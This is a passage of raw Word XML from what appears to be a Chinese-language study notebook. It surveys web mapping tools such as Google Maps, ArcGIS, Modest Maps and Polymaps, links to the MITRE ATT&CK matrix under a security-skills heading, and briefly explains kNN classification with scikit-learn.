    <w:p w14:paraId="3EB8F19E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这是最容易的在线工具，提供了基于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">JavaScript </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的地图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，以及一些地理相关服务，只要一些编程技巧就能实现。其中最可靠的是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Google</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地图。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581A1968" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C4D90E8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Google</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:bookmarkStart w:id="782" w:name="OLE_LINK35"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://code.google.com/apis/maps/</w:t>
      </w:r>
      <w:bookmarkEnd w:id="782"/>
    </w:p>
    <w:p w14:paraId="46BD0439" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开发者文档</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: https://developers.google.com/maps/documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C57E6EE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33432BB4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32F059CE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ArcGIS (http://esri.com/software/arcgis/ )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B1FD44" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C4DF3D7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>专业的地理制图师所用的工具。是一款大型软件，可以处理大批量的数据，还提供了平滑、合成等众多功能。你可以在用户界面中完成所有的事情，所以不需要写代码。缺点是按钮和菜单元素有些过多，显得有些笨拙。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65906CA6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70A50B92" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Modest Maps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B9D621" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22586DA8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Flash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ActionScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的区块拼接地图函数库，支持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。它更像一个框架，不仅只是一个地图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，只提供极少的必备条件，方便你创建在线地图。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Modest Maps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BSD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>许可协议发布的，可以免费使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35738C51" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CDAC170" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Polymaps </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://polymaps.org/ )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3BC080" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1254CE09" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有点像</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">JavaScript </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Modest Maps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，除了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Modest Maps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的基础地图绘制外，还有一个内置功能，例如区域密度图和气泡图。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地图函数库的所有代码都是在浏览器内原生运行，执行起来更加容易，也便于日后更新。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A70F972" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B1E83E0" w14:textId="353EBF90" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4347BF18" w14:textId="0985AFC4" w:rsidR="00E56137" w:rsidRDefault="00E56137" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="783" w:name="_Toc159780205"/>
      <w:r>
        <w:t>安全服务技能</w:t>
      </w:r>
      <w:bookmarkEnd w:id="783"/>
    </w:p>
    <w:p w14:paraId="2D70DFD9" w14:textId="4BAE3DA8" w:rsidR="00E56137" w:rsidRDefault="00E56137" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76803FD4" w14:textId="3F12160D" w:rsidR="00E56137" w:rsidRDefault="00E56137" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33E4C578" w14:textId="64745B0A" w:rsidR="00B7372E" w:rsidRDefault="00D64696" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="784" w:name="_Toc159780206"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ATT</w:t>
      </w:r>
      <w:r>
        <w:t>&amp;CK</w:t>
      </w:r>
      <w:bookmarkEnd w:id="784"/>
    </w:p>
    <w:p w14:paraId="24BFC760" w14:textId="0C337CD1" w:rsidR="00B7372E" w:rsidRDefault="00D64696" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D64696">
        <w:t>https://attack.mitre.org/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0FA5AC" w14:textId="1B223629" w:rsidR="00B7372E" w:rsidRDefault="00D64696" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mitre</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ATT</w:t>
      </w:r>
      <w:r>
        <w:t>&amp;CK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>列表</w:t>
      </w:r>
      <w:r w:rsidR="00EA6911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表格</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFB60A4" w14:textId="2CB74660" w:rsidR="00D64696" w:rsidRDefault="00D64696" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E139FB4" w14:textId="77777777" w:rsidR="00D64696" w:rsidRDefault="00D64696" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AE2B8AF" w14:textId="693A354D" w:rsidR="00B7372E" w:rsidRDefault="00B7372E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="791BAE79" w14:textId="0D613DB2" w:rsidR="00B7372E" w:rsidRDefault="00B7372E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66887D26" w14:textId="2AF5E8DD" w:rsidR="00B7372E" w:rsidRDefault="00B7372E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36F3260D" w14:textId="51A975A9" w:rsidR="00B7372E" w:rsidRDefault="00B7372E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D13C469" w14:textId="1364FE89" w:rsidR="00B7372E" w:rsidRDefault="00B7372E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24858AB0" w14:textId="743E7360" w:rsidR="00B7372E" w:rsidRDefault="00B7372E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ADD2CA1" w14:textId="77777777" w:rsidR="00B7372E" w:rsidRDefault="00B7372E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CB5ECB6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="785" w:name="_Toc159780207"/>
      <w:bookmarkStart w:id="786" w:name="OLE_LINK33"/>
      <w:r>
        <w:t>ML</w:t>
      </w:r>
      <w:bookmarkEnd w:id="785"/>
    </w:p>
    <w:bookmarkEnd w:id="786"/>
    <w:p w14:paraId="0A46CEC6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>临近分类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>kNN--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>小范围投票，少数服从多数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59772E70" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C3D547B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>样本数据及可视化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DECBB2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="693963C6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sklearn.neighbors.KNeighborsClassifier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B58349" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数默认的近邻数量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>n_neighbors</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，默认距离度量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>metric</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为欧氏距离</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(Euclidean distance)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237A77FD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个函数常用的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>methods</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fit(x,y)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>predit(q)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C59F10A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fit(x,y)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用来加载样本数据，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>predit(q)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用来预测查询点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的分类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1180D517" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="167B9FA3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SciKit-learn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（曾经叫做</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>scikits.learn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还叫作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sklearn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），适用于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编程语言的自由软件机器学习库。特征是具有各种分类、回归和聚类算法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA7E03F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="065294ED" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sk-learn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2927F8E1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: https://en.wikipedia.org/wiki/Scikit-learn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D838CBA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>scikit-learn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（以前称为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>scikits.learn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，也称为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sklearn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编程语言的免费软件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>机器学习</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">[3] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>它具有各种分类、回归和聚类算法，包括支持向量机、随机森林、梯度提升、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>均值和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DBSCAN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，旨在与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数值和科学库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NumPy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>科学派。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Scikit-learn </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NumFOCUS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>财政赞助的项目。</w:t>
      </w:r>
    </w:p>
